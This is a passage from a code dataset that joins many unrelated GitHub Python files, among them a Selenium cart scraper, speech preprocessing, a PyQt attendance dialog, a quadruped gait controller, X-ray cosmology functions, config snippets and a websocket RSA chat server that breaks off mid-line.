10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#app > div.pe-none.cart-button.container > div > div > div > button\",\n )\n )\n )\n basket.click()\n print(\"Кликнул на корзину\")\n\n # Выбор элемента корзины\n time.sleep(\n 1\n ) # Корзина без ожидания не до конца прогружается, по этому использовал time.sleep\n screen = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (\n By.CSS_SELECTOR,\n \"#app > div.pe-none.cart-button.container > div > div > div.popover__content\",\n )\n )\n )\n screen.screenshot(\"./image/basket_image.png\")\n print(\"сохранил скриншот корзины\")\n\nexcept Exception as ex:\n print(ex)\nfinally:\n driver.close()\n driver.quit()\n","repo_name":"SuNseTgReeN/FoodSoul","sub_path":"main_telegram.py","file_name":"main_telegram.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70914946810","text":"from pathlib import Path\nimport json, datetime\n\n\ndef checkIfFileExists(filename):\n my_file = Path(filename)\n if my_file.is_file():\n return True\n else:\n return False\n\ndef writeJson(file, list):\n print(datetime.datetime.now().isoformat() + \" ##### CommonService: Write to file \" + file + \" #####\")\n listDTO = json.dumps(list, ensure_ascii=False, default=lambda o: o.__dict__,\n sort_keys=False, indent=4)\n with open(file, 'w') as json_file:\n json_file.write(listDTO + '\\n')","repo_name":"mariomaf/bot","sub_path":"services/CommonServices.py","file_name":"CommonServices.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1715285969","text":"import numpy as np\nimport os\nimport audio\n\nfrom tqdm import tqdm\nfrom functools import partial\nfrom concurrent.futures import ProcessPoolExecutor\n\n\ndef build_from_path(in_dir, out_dir):\n index = 1\n # executor = ProcessPoolExecutor(max_workers=4)\n # futures = []\n texts = []\n\n with open(os.path.join(in_dir, 'metadata.csv'), encoding='utf-8') as f:\n for line in f.readlines():\n if index % 100 == 0:\n print(\"{:d} Done\".format(index))\n parts = line.strip().split('|')\n wav_path = os.path.join(in_dir, 'wavs', '%s.wav' % parts[0])\n text = parts[2]\n # futures.append(executor.submit(\n # partial(_process_utterance, out_dir, index, wav_path, text)))\n texts.append(_process_utterance(out_dir, index, wav_path, text))\n\n index = index + 1\n\n # return [future.result() for future in tqdm(futures)]\n return texts\n\n\ndef _process_utterance(out_dir, index, wav_path, text):\n # Compute a mel-scale spectrogram from the wav:\n mel_spectrogram = audio.tools.get_mel(wav_path).numpy().astype(np.float32)\n\n # Write the spectrograms to disk:\n mel_filename = 'ljspeech-mel-%05d.npy' % index\n np.save(os.path.join(out_dir, mel_filename),\n mel_spectrogram.T, allow_pickle=False)\n\n return text\n","repo_name":"xcmyz/FastSpeech","sub_path":"data/ljspeech.py","file_name":"ljspeech.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"77"} +{"seq_id":"17143194502","text":"# 信息采集主界面\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom sklearn import neighbors\nimport os\nimport os.path\nimport pickle\nfrom PIL import Image, ImageDraw\nimport face_recognition\nfrom face_recognition.face_recognition_cli import image_files_in_folder\nimport cv2\nimport pandas as pd\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtCore import QTimer, QDateTime, QCoreApplication, QThread\nfrom PyQt5.QtGui import QImage, QIcon, QPixmap\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMessageBox, QInputDialog\nimport sys\nfrom datetime import datetime\nimport imutils\n\nimport UI.information_gui as information_gui\nimport information_collection as information_collection\nimport global_value\n\n\nclass InfoDialog(QWidget):\n def __init__(self):\n # super()构造器方法返回父级的对象。__init__()方法是构造器的一个方法。\n super().__init__()\n\n self.Dialog = information_gui.Ui_Form()\n self.Dialog.setupUi(self)\n\n # 实现路径错误提示,方便定位错误\n self.current_filename = os.path.basename(__file__)\n\n try:\n # 设置窗口名称和图标\n self.setWindowTitle('个人信息采集')\n self.setWindowIcon(QIcon(\n f'/Users/fanzitian/Library/Mobile Documents/com~apple~CloudDocs/CODE/Python_code/2022_robot_CurriculumDesign/logo_imgs/fcb_logo.jpg'))\n\n except FileNotFoundError as e:\n print(\"[ERROR] UI背景图片路径不正确!(source file: {})\".format(\n self.current_filename), e)\n\n # 设置信息采集按键连接函数\n self.Dialog.bt_start_collect.clicked.connect(self.open_camera)\n # 设置查询信息按键连接函数\n self.Dialog.bt_check_info.clicked.connect(self.check_info)\n # 设置修改信息按键连接函数\n self.Dialog.bt_change_info.clicked.connect(self.change_info)\n # 设置添加信息按键连接函数\n self.Dialog.bt_add_info.clicked.connect(self.add_info)\n\n # 初始化摄像头\n self.cap = cv2.VideoCapture(0)\n\n def handle_click(self):\n if not self.isVisible():\n self.show()\n\n def handle_close(self):\n self.close()\n\n def open_camera(self):\n self.dialog_text_id, ok_1 = QInputDialog.getText(\n self, '创建个人图像数据库', '请输入学号:')\n self.dialog_text_name, ok_2 = QInputDialog.getText(\n self, '创建个人图像数据库', '请输入姓名:')\n if ok_1 & ok_2:\n self.Dialog.label_capture.clear()\n self.cap.open(0)\n\n self.Dialog.label_capture.clear()\n print(\"[INFO] starting video stream...\")\n\n information_collection.CatchPICFromVideo(\n \"get face\", 0, 99, self.dialog_text_name, self.dialog_text_id)\n\n def check_info(self):\n dict_from_csv = pd.read_csv('students_data.csv').to_dict()\n\n name = self.Dialog.lineEdit_name.text()\n student_id = int(self.Dialog.lineEdit_id.text())\n result_number = list(dict_from_csv['id'].values()).index(student_id)\n self.Dialog.tableView.append('{} {} {} {} 查询学生信息成功!'.format(\n dict_from_csv['name'][result_number], dict_from_csv['id'][result_number],\n dict_from_csv['absenteeism'][result_number], dict_from_csv['attendance_rate'][result_number]))\n\n def add_info(self):\n dict_from_csv = pd.read_csv('students_data.csv').to_dict()\n # 创建一个空字典\n new_student_info = {}\n # 输入学生信息\n new_student_info['name'] = self.Dialog.lineEdit_name.text()\n new_student_info['id'] = self.Dialog.lineEdit_id.text()\n new_student_info['absenteeism'] = 0\n new_student_info['attendance_rate'] = 0.0\n # 将学生信息添加到字典中\n dict_from_csv['name'][len(dict_from_csv['name'])] = (\n new_student_info['name'])\n dict_from_csv['id'][len(dict_from_csv['id'])] = (\n new_student_info['id'])\n dict_from_csv['absenteeism'][len(dict_from_csv['absenteeism'])] = (\n new_student_info['absenteeism'])\n dict_from_csv['attendance_rate'][len(dict_from_csv['attendance_rate'])] = (\n new_student_info['attendance_rate'])\n # 将字典转换为csv文件\n pd.DataFrame(dict_from_csv).to_csv('students_data.csv')\n self.Dialog.tableView.append('{} {} 添加学生信息成功!'.format(\n new_student_info['name'], new_student_info['id']))\n\n def change_info(self):\n dict_from_csv = pd.read_csv('students_data.csv')\n # 输入要修改的学生姓名\n name = self.Dialog.lineEdit_name.text()\n \n dict_from_csv = dict_from_csv.drop([list(\n (dict_from_csv.to_dict())['name'].values()).index(name)])\n dict_from_csv = dict_from_csv.to_dict()\n \n # 输入要修改的学生信息\n new_student_info = {}\n new_student_info['name'], ok = QInputDialog.getText(\n self, '修改学生信息', '请输入学生姓名:')\n new_student_info['id'], ok = QInputDialog.getText(\n self, '修改学生信息', '请输入学生学号:')\n str_absenteeism, ok = QInputDialog.getText(\n self, '修改学生信息', '请输入学生缺勤次数:')\n new_student_info['absenteeism'] = int(str_absenteeism)\n new_student_info['attendance_rate'] = (\n 1 - (new_student_info['absenteeism']) / global_value.number_of_courses)\n\n # 将学生信息添加到字典中\n dict_from_csv['name'][len(dict_from_csv['name'])] = (\n new_student_info['name'])\n dict_from_csv['id'][len(dict_from_csv['id'])] = (\n new_student_info['id'])\n dict_from_csv['absenteeism'][len(dict_from_csv['absenteeism'])] = (\n new_student_info['absenteeism'])\n dict_from_csv['attendance_rate'][len(dict_from_csv['attendance_rate'])] = (\n new_student_info['attendance_rate'])\n # 将字典转换为csv文件\n pd.DataFrame(dict_from_csv).to_csv('students_data.csv')\n self.Dialog.tableView.append('{} {} {} {} 修改学生信息成功!'.format(\n new_student_info['name'], new_student_info['id'], new_student_info['absenteeism'], new_student_info['attendance_rate']))\n\n def closeEvent(self, event):\n reply = QMessageBox.question(\n self, 'Message', 'Are you sure to quit?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n infowindow = InfoDialog()\n infowindow.show()\n sys.exit(app.exec_())\n","repo_name":"jamestian118/2022_robot_CurriculumDesign","sub_path":"Dialog/InfoDialog.py","file_name":"InfoDialog.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75063680569","text":"from numpy import array,sign,linspace,pi\nfrom threading import Thread\nfrom LegModel import LegModel\nfrom time import sleep\n\nclass QModel(Thread):\n def __init__(self,legs_lengths,legs_positions,legs_base_angles,*args,**kwargs):\n assert len(legs_lengths)==len(legs_positions)==len(legs_base_angles), \"Number of legs missmatch\"\n super().__init__(*args,**kwargs)\n self.legs = [\n LegModel(length, position, angle_base)\n for length, position, angle_base\n in zip(legs_lengths,legs_positions, legs_base_angles)\n ]\n self._updater = None\n self.__input = None\n self.__walk_phase = 0.\n self.__updates_per_phase = 25\n self.__gaint_offset = array([2,0.5,-1.])\n self.__gaint_offset_up = 0.75\n self.__d = 8\n self.__ds = (self.__d-1.)/self.__d\n self.__legs_shift = [0. , 0.75, 0.50, 0.25]\n def _sign(x):\n t = sign(x)\n t[t==0] = 1\n return t\n self.gaint_pattern_base = array([\n [\n leg.position + (_sign(leg.position)*self.__gaint_offset ),\n leg.position + (_sign(leg.position)*self.__gaint_offset )\n ]\n for leg in self.legs\n ])\n self.gaint_pattern_base = array([\n [\n _sign(leg.position)*[4,4,-1.],\n _sign(leg.position)*[4,4,-1.]\n ]\n for leg in self.legs\n ])\n self.rotate_d = array([\n [ [-1,1],[1,-1] ],\n [ [-1,-1],[1,1] ],\n [ [1,-1],[-1,1] ],\n [ [1,1],[-1,-1] ],\n ])*-1\n self.rotate_h = array([\n [1,1],[-1,1],[-1,-1],[1,-1]\n ])\n self.advance_max, self.side_max, self.rotate_max = 1.3,.75,.5\n\n\n\n def set_updater(self,fnc):\n self._updater = fnc\n\n def set_user_input(self,inp):\n self.__input = inp\n\n def fk(self,angles,*args,**kwargs): return [ leg.forward_kinetics(angle,*args,**kwargs) for leg,angle in zip(self.legs,angles)]\n def ik(self,points,update=True,*args,**kwargs): return array([ leg.inverse_kinetics(point,update=update,*args,**kwargs) for leg,point in zip(self.legs,points) ])\n\n def __call__(self,points=None,angles=None,update=True,*args,**kwargs):\n if self._updater:\n if points is not None:\n return self._updater(self.ik(points,update=update,*args,**kwargs))\n elif angles is not None:\n if update:\n for leg,angle in zip(self.legs, angles):\n leg.current = angle\n return self._updater(angles)\n else: raise Exception('Set updater first!')\n\n def run(self):\n # Init walk\n ## Each leg center point\n gaint_pattern = self.gaint_pattern_base.copy()\n ## Calculate each leg angles for center point and go there\n legs_base_angles = array([\n leg(target=gp[0],starting_angles=[0.,1.,-2.])\n for leg,gp in zip(self.legs,gaint_pattern)\n ])\n ## Calculate update interval, steps ect.\n interval = 1 / self.__updates_per_phase\n phase_steps = linspace(0,1,self.__updates_per_phase)\n ## Stare input reader\n self.__input.start()\n ## Get current input state\n last_state = self.__input.state\n # Main loop\n while True:\n if len(self.__input.button_down)==0:\n for phase_step in phase_steps:\n ## Get input\n state = self.__input.state\n ## Do we need to update gaint pattern\n if last_state != state:\n advance, side, rotate, height, gx, gy = state\n ## OK, lets update\n gaint_pattern = self.gaint_pattern_base.copy()\n for gp,rd,rh in zip(gaint_pattern,self.rotate_d,self.rotate_h):\n gp[0][1] += advance*self.advance_max\n gp[1][1] -= advance*self.advance_max\n gp[0][0] += side*self.side_max\n gp[1][0] -= side*self.side_max\n gp[0][0] += rotate*self.rotate_max*rd[0][0]\n gp[0][1] += rotate*self.rotate_max*rd[0][1]\n gp[1][0] += rotate*self.rotate_max*rd[1][0]\n gp[1][1] += rotate*self.rotate_max*rd[1][1]\n gp[0][2] = -height*2.5\n gp[1][2] = -height*2.5\n\n gp[0][0] += gx\n gp[1][0] += gx\n gp[0][1] += gy\n gp[1][1] += gy\n\n # gp[0][2] += rh[0]*gx + rh[1]*gy\n # gp[1][2] += rh[0]*gx + rh[1]*gy\n\n legs_base_angles = array([\n leg(target=gp[0],starting_angles=[0.,1.,-2.])\n for leg,gp in zip(self.legs,gaint_pattern)\n ])\n last_state = state\n ## Do we have any velocity\n all_angels = []\n if state[0] != 0 or state[1] != 0 or state[2] != 0:\n ### OK, lets move to new angles\n for leg,leg_shift,gp,leg_base_angles in zip(self.legs,self.__legs_shift,gaint_pattern,legs_base_angles):\n leg_phase = leg_shift + phase_step\n if leg_phase> 1.: leg_phase-=1\n if leg_phase > self.__ds:\n leg_p,leg_up = -self.__d*leg_phase+self.__d, True\n else:\n leg_p,leg_up = leg_phase/self.__ds, False\n target = array([\n gp[0][0]*(1.-leg_p) + gp[1][0]*leg_p,\n gp[0][1]*(1.-leg_p) + gp[1][1]*leg_p,\n gp[0][2]\n ])\n if leg_up: target[2] = 0 # self.__gaint_offset_up\n angels = leg(target=target,starting_angles = leg_base_angles)\n for a in angels: all_angels.append(a)\n self._updater(all_angels)\n sleep(interval)\n else:\n self._updater(legs_base_angles)\n sleep(interval)\n break\n else:\n angel = list(self.__input.state[0:3])\n angel = [-angel[2]*pi/2,-angel[0]*pi/2,angel[1]*pi/2]\n angels = legs_base_angles.copy()\n\n if 1 in self.__input.button_down:\n angel[0] += 1\n angel[1] += 1\n angel[2] += -1\n angels[0] = angel\n angels[1][0] = -1.\n\n if 5 in self.__input.button_down:\n angels[0] = angel\n if 4 in self.__input.button_down:\n angels[1] = angel\n if 2 in self.__input.button_down:\n angels[2] = angel\n if 3 in self.__input.button_down:\n angels[3] = angel\n self._updater(angels)\n sleep(interval)\n self.__input.stop()\n\nif __name__ == \"__main__\":\n from JoystickInput import JoystickInput\n from configs import my_quad as config\n from q_controller import set_angles\n\n try:\n MyQuadrupet = QModel(*config)\n MyQuadrupet.set_user_input(JoystickInput())\n MyQuadrupet.set_updater(set_angles)\n MyQuadrupet.start()\n\n except KeyboardInterrupt: pass\n","repo_name":"cb1986ster/Scout","sub_path":"QModel.py","file_name":"QModel.py","file_ext":"py","file_size_in_byte":7806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11999578184","text":"\"\"\"\n\nXray structure, helper functions, and definitions\n\nAuthor: Julian B. Muñoz\nUT Austin and Harvard CfA - January 2023\n\n\"\"\"\n\nimport numpy as np\nfrom . import constants\nfrom .cosmology import n_baryon, HubinvMpc\n\n\nclass Xray_class:\n \"Class containing the X-ray functions that we want to pass to main calculation\"\n\n def __init__(self, Cosmo_Parameters):\n\n self.atomfractions = np.array([Cosmo_Parameters.f_H,Cosmo_Parameters.f_He]) #faction of baryons in HI and HeI, assumed to just be the avg cosmic\n self.atomEnIon = np.array([constants.EN_ION_HI, constants.EN_ION_HeI]) #threshold energies for each, in eV\n self.TAUMAX=100. #max optical depth, cut to 0 after to avoid overflows\n\n\n def optical_depth(self, Cosmo_Parameters, En,z,zp):\n \"Function that calculates the optical depth for a photon of energy En/eV from z to zp\"\n Nzinttau = np.floor(10*constants.precisionboost).astype(int)\n #surprisingly it converges very quickly, since things are smooth functions of nu/z. Warning, make sure to tweak if SED is not a powerlaw!\n\n Envec = np.asarray([En]) if np.isscalar(En) else np.asarray(En)\n\n zinttau = np.linspace(z,zp,Nzinttau)\n\n\n Eninttautab = np.outer((1+zinttau)/(1+z) , Envec)\n\n sigmatot = self.atomfractions[0] * sigma_HI(Eninttautab)\n sigmatot += self.atomfractions[1] * sigma_HeI(Eninttautab)\n sigmatot = sigmatot.T #to broadcast below\n\n integrand = 1.0/HubinvMpc(Cosmo_Parameters, zinttau)/(1+zinttau) * sigmatot * n_baryon(Cosmo_Parameters, zinttau) * constants.Mpctocm\n taulist = np.trapz(integrand, zinttau, axis=1)\n\n #OLD: kept for reference only.\n # taulist = 1.0*np.zeros_like(Envec)\n # for iE, Energy in enumerate(Envec):\n # Eninttau = (1+zinttau)/(1+z) * Energy\n # sigmatot = self.atomfractions[0] * sigma_HI(Eninttau)\n # sigmatot += self.atomfractions[1] * sigma_HeI(Eninttau)\n # #we ignore HeII since it's a small correction (Pritchard and Furlanetto 06)\n #\n # integrand = 1.0/HubinvMpc(Cosmo_Parameters, zinttau)/(1+zinttau) * sigmatot * n_baryon(Cosmo_Parameters, zinttau) * constants.Mpctocm\n #\n # taulist[iE] = np.trapz(integrand, zinttau)\n\n indextautoolarge = np.array(taulist>=self.TAUMAX)\n taulist [indextautoolarge] = self.TAUMAX\n return taulist\n\n\n\n\n def opacity_Xray(self, Cosmo_Parameters, En,z,zp):\n \"Returns opacity, see optical_depth() for the hard calculation.\"\n\n XRAY_OPACITY_MODEL = Cosmo_Parameters.Flag_emulate_21cmfast\n #important, 0 = standard, 1=21cmfast-like (step at tau=1)\n\n\n if(XRAY_OPACITY_MODEL==0): #0 is standard/regular.\n return np.exp(-self.optical_depth(Cosmo_Parameters,En,z,zp))\n elif (XRAY_OPACITY_MODEL==1): #1 is 21cmFAST-like (step-wise exp(-tau), either 1 or 0)\n return np.heaviside(1.0 - self.optical_depth(Cosmo_Parameters,En,z,zp), 0.5)\n else:\n print('ERROR, choose a correct XRAY_OPACITY_MODEL')\n\n\n def lambda_Xray_com(self, Cosmo_Parameters, En,z):\n \"Returns the mean free path in cMpc of an Xray of energy En/eV near z. Unused but good cross check\"\n\n sigmatot = self.atomfractions[0] * sigma_HI(En)\n sigmatot += self.atomfractions[1] * sigma_HeI(En)\n\n return (1.0/(sigmatot * n_baryon(Cosmo_Parameters,z))/constants.Mpctocm*(1+z) )\n\n\n\n\ndef sigma_HI(Energyin):\n \"cross section for Xray absorption for neutral HI, from astro-ph/9601009 and takes Energy in eV and returns cross sec in cm^2\"\n E0 = 4.298e-1\n sigma0 = 5.475e4\n ya = 3.288e1\n P = 2.963\n yw = 0.0\n y0 = 0.0\n y1 = 0.0\n\n Energy = Energyin\n\n warning_lowE_HIXray = np.heaviside(13.6 - Energy, 0.5)\n if(np.sum(warning_lowE_HIXray) > 0):\n print('ERROR! Some energies for Xrays below HI threshold in sigma_HI. Too low!')\n\n\n x = Energy/E0 - y0\n y = np.sqrt(x**2 + y1**2)\n Fy = ((x-1.0)**2 + yw**2) * y**(0.5*P - 5.5) * (1.0+np.sqrt(y/ya))**(-P)\n\n return sigma0 * constants.sigma0norm * Fy\n\n\n\ndef sigma_HeI(Energyin):\n \"same as sigma_HI but for HeI, parameters are:\"\n E0 = 13.61\n sigma0 = 9.492e2\n ya = 1.469\n P = 3.188\n yw = 2.039\n y0 = 4.434e-1\n y1 = 2.136\n\n Energy = Energyin\n warning_lowE_HeIXray = np.heaviside(25. - Energy, 0.5)\n if(np.sum(warning_lowE_HeIXray) > 0):\n print('ERROR! Some energies for Xrays below HeI threshold in sigma_HeI. Too low!')\n\n\n x = Energy/E0 - y0\n y = np.sqrt(x**2 + y1**2)\n Fy = ((x-1.0)**2 + yw**2) * y**(0.5*P - 5.5) * (1.0+np.sqrt(y/ya))**(-P)\n\n return sigma0 * constants.sigma0norm * Fy\n","repo_name":"JulianBMunoz/Zeus21","sub_path":"zeus21/xrays.py","file_name":"xrays.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"36321495628","text":"import logging\nimport anyio\n\nfrom moat.mqtt.client import open_mqttclient, ConnectException\n\n\n#\n# This sample shows how to publish messages to broker using different QOS\n# Debug outputs shows the message flows\n#\n\nlogger = logging.getLogger(__name__)\n\n\nasync def test_coro():\n try:\n async with open_mqttclient() as C:\n await C.connect(\"mqtt://0.0.0.0:1883\")\n\n await C.publish(\"data/classified\", b\"TOP SECRET\", qos=0x01)\n await C.publish(\"data/memes\", b\"REAL FUN\", qos=0x01)\n await C.publish(\n \"repositories/mqtt/master\", b\"NEW STABLE RELEASE\", qos=0x01\n )\n await C.publish(\n \"repositories/mqtt/devel\", b\"THIS NEEDS TO BE CHECKED\", qos=0x01\n )\n await C.publish(\"calendar/mqtt/releases\", b\"NEW RELEASE\", qos=0x01)\n logger.info(\"messages published\")\n except ConnectException as ce:\n logger.error(\"Connection failed: %r\", ce)\n\n\nif __name__ == \"__main__\":\n formatter = (\n \"[%(asctime)s] %(name)s {%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n )\n formatter = \"%(message)s\"\n logging.basicConfig(level=logging.DEBUG, format=formatter)\n anyio.run(test_coro)\n","repo_name":"M-o-a-T/moat-mqtt","sub_path":"samples/client_publish_acl.py","file_name":"client_publish_acl.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"17600887242","text":"# Layer capabilities, for bitwise operations\nQUERYABLE = 1\nFILTRABLE = 2\nEDITABLE = 4\nWFS = 4\n\nVECTOR_URL = '/vector/api/'\n\n# Layer edit options, , for bitwise operations\nINSERT = 1\nUPDATE = 2\nDELETE = 4\n\n# Tilestache config base\nTILESTACHE_CONFIG_BASE = {\n \"cache\": {\n\t\"name\": \"Disk\",\n \"path\": \"/tmp/stache\",\n \"umask\": \"0000\",\n \"dirs\": \"portable\",\n \"gzip\": [\"xml\", \"json\"]\n },\n \"layers\": {},\n \"logging\": \"debug\"\n}","repo_name":"comunedibari/SIT","sub_path":"sorgenti/g3w-admin-v.3.2/g3w-admin/base/settings/base_geo_settings.py","file_name":"base_geo_settings.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74661002808","text":"from sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy import func\nfrom server.exceptions import (\n IconNotSupportedException,\n TransferUsageNameDuplicateException\n)\nfrom server.constants import (\n MATERIAL_COMMUNITY_ICONS\n)\n\nfrom server import db\nfrom server.models.utils import ModelBase, credit_transfer_transfer_usage_association_table\n\nclass TransferUsage(ModelBase):\n __tablename__ = 'transfer_usage'\n\n _name = db.Column(db.String, unique=True, index=True)\n is_cashout = db.Column(db.Boolean)\n _icon = db.Column(db.String)\n priority = db.Column(db.Integer)\n translations = db.Column(JSON)\n default = db.Column(db.Boolean)\n\n users = db.relationship('User', backref='business_usage', lazy=True)\n\n credit_transfers = db.relationship(\n \"CreditTransfer\",\n secondary=credit_transfer_transfer_usage_association_table,\n back_populates=\"transfer_usages\",\n )\n\n @hybrid_property\n def icon(self):\n return self._icon\n\n @icon.setter\n def icon(self, icon):\n if icon not in MATERIAL_COMMUNITY_ICONS:\n raise IconNotSupportedException(f'Icon {icon} not supported or found')\n self._icon = icon\n\n @hybrid_property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, name):\n stripped_name = name.strip()\n exists = db.session.query(TransferUsage.id).filter(\n func.lower(TransferUsage.name) == func.lower(stripped_name)).scalar() is not None\n if not exists:\n self._name = stripped_name\n else:\n raise TransferUsageNameDuplicateException(\n 'Transfer usage name {} is duplicate'.format(name))\n\n @classmethod\n def find_or_create(cls, raw_name, default=False, **kwargs) -> \"TransferUsage\":\n name = raw_name.strip()\n usage = db.session.query(TransferUsage).filter(\n func.lower(TransferUsage.name) == func.lower(name)).first()\n if usage is None:\n usage = cls(name=name, default=default, **kwargs)\n db.session.add(usage)\n db.session.flush()\n return usage\n\n def __repr__(self):\n return f''","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/server/models/transfer_usage.py","file_name":"transfer_usage.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"11681087563","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom game.piece.movement import PieceMovement\nfrom utils import BoardVector2d, Symmetry\n\nif TYPE_CHECKING:\n from game.piece.piece import Piece\n from game.board import Board\n\n\nclass KnightMovement(PieceMovement):\n def __init__(self, knight: Piece, board: Board) -> None:\n super().__init__(knight, board)\n\n # override\n def get_all_moves(self) -> list[list[BoardVector2d]]:\n moves: list[[BoardVector2d]] = [[]]\n\n base_vectors = [BoardVector2d(1, 2), BoardVector2d(2, 1)]\n pos = self._piece.position\n symmetries = [None, Symmetry.X_AXIS, Symmetry.ORIGIN, Symmetry.Y_AXIS]\n positions = [pos + v.pivot_symmetry(s) if s is not None else pos + v for v in base_vectors for s in symmetries]\n\n for p in positions:\n if not self._board.is_out_of_bounds(p):\n moves[0].append(p)\n\n return moves\n\n # override\n def get_legal_moves(self) -> list[list[BoardVector2d]]:\n self._legal_moves.clear()\n self._legal_moves.append([])\n\n for m in self.get_all_moves()[0]:\n if self._board.can_move_to(m, self._piece, capture=True):\n self._legal_moves[0].append(m)\n\n return self._legal_moves\n\n","repo_name":"agh-cs-imbeciles/python-laser-chess","sub_path":"src/game/piece/movement/knight_movement.py","file_name":"knight_movement.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42543538257","text":"from __future__ import absolute_import\nimport os\nfrom celery import Celery\nfrom django.conf import settings\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','terminal.settings')\napp = Celery('terminal')\napp.config_from_object('django.conf:settings')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\n\napp.conf.beat_schedule = {\n 'delete-expired-urls': {\n 'task': 'apps.endpoints.tasks.delete_expired_urls',\n 'schedule': 1800,\n },\n}\n","repo_name":"vediprashant/terminal_api","sub_path":"terminal/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22163522598","text":"import json\nimport logging\n\nimport threading\nfrom websocket_server import WebsocketServer\nfrom logic import *\nfrom time import sleep\n# from flask_cors import CORS\n# from flask_socketio import SocketIO, emit\n# from flask_sockets import Sockets\nimport base64\n\nusernames = dict()\nserver_private_keys = dict()\nserver_new_private_keys = dict()\nclient_public_keys = dict()\n\n\ndef encode_public_keynumbers(pbkn):\n e = base64.b64encode(int_to_bytes(pbkn.e)).decode('ascii')\n n = base64.b64encode(int_to_bytes(pbkn.n)).decode('ascii')\n return e, n\n\n\ndef decode_public_keynumbers(eb64, nb64):\n eb = base64.b64decode(eb64)\n nb = base64.b64decode(nb64)\n e = int_from_bytes(eb)\n n = int_from_bytes(nb)\n return e, n\n\n\ndef int_to_bytes(x):\n return x.to_bytes((x.bit_length() + 7) // 8, 'big')\n\n\ndef int_from_bytes(xbytes):\n return int.from_bytes(xbytes, 'big')\n\n\ndef format_message(event, data, message_blocks=[]):\n message = {\n \"event_type\": event,\n \"message_blocks\": message_blocks,\n \"data\": data\n }\n return json.dumps(message)\n\n\n# app = Flask(__name__)\n# app.debug = True\n# sockets = Sockets(app)\ndef on_new_client(client, server):\n print(client['id'], client['address'], sep='|')\n\n\ndef on_message(client, server, message):\n msg = json.loads(message)\n event = msg[\"event_type\"]\n handler = handlers[event]\n handler(client, msg)\n\n\ndef on_register(client, msg):\n data = msg['data']\n client_id = client['id']\n if client_id in usernames:\n server.send_message(client, format_message('registration_fail', {}))\n return\n username = data['username']\n eb64, nb64 = data['e'], data['n']\n\n usernames[client_id] = username\n\n e, n = decode_public_keynumbers(eb64, nb64)\n userPbk = create_public_key(e, n)\n client_public_keys[client_id] = userPbk\n\n server_prk = generate_new_private_key()\n server_private_keys[client_id] = server_prk\n e_serverb64, n_serverb64 = encode_public_keynumbers(\n server_prk.public_key().public_numbers()\n )\n\n server.send_message(\n client,\n format_message(\n 'registration_success',\n {\n 'e': e_serverb64,\n 'n': n_serverb64\n }\n )\n )\n\n server.send_message_to_all(\n format_message(\n 'client_joined_chat',\n {\n 'username': username\n }\n )\n )\n\n lock = threading.Lock()\n lock.acquire()\n server_new_private_keys[client_id] = server_prk\n lock.release()\n\n\ndef on_check_username(client, msg):\n data = msg['data']\n username = data['username']\n if username in usernames.values():\n server.send_message(client, format_message('username_taken', {}))\n else:\n server.send_message(client, format_message('username_available', {}))\n\n\ndef on_chat_message(client, msg):\n data = msg['data']\n client_id = client['id']\n username = usernames[client_id]\n\n eb64, nb64 = data['e'], data['n']\n e, n = decode_public_keynumbers(eb64, nb64)\n client_public_keys[client_id] = create_public_key(e, n)\n private_key = server_private_keys[client_id]\n\n message_blocks = msg['message_blocks']\n message_bytes = []\n for block in message_blocks:\n block_decoded = base64.b64decode(block)\n block_decrypted = decrypt(block_decoded, private_key)\n message_bytes += block_decrypted\n\n for curr_client in server.clients:\n curr_client_id = curr_client['id']\n if curr_client_id not in usernames:\n continue\n curr_client_pbk = client_public_keys[curr_client_id]\n\n lock = threading.Lock()\n if lock.acquire(blocking=False):\n private_key = server_new_private_keys[client_id]\n server_private_keys[client_id] = private_key\n else:\n private_key = server_private_keys[client_id]\n lock.release()\n\n message_blocks_encrypted = []\n message_bytes_original = message_bytes\n\n while len(message_bytes_original) != 0:\n block = message_bytes_original[:245]\n block_encrypted = encryptb64(block, curr_client_pbk)\n block_encoded = block_encrypted.decode('ascii')\n message_blocks_encrypted.append(block_encoded)\n message_bytes_original = message_bytes_original[245:]\n message_data = {\n 'username': username,\n }\n event_type = 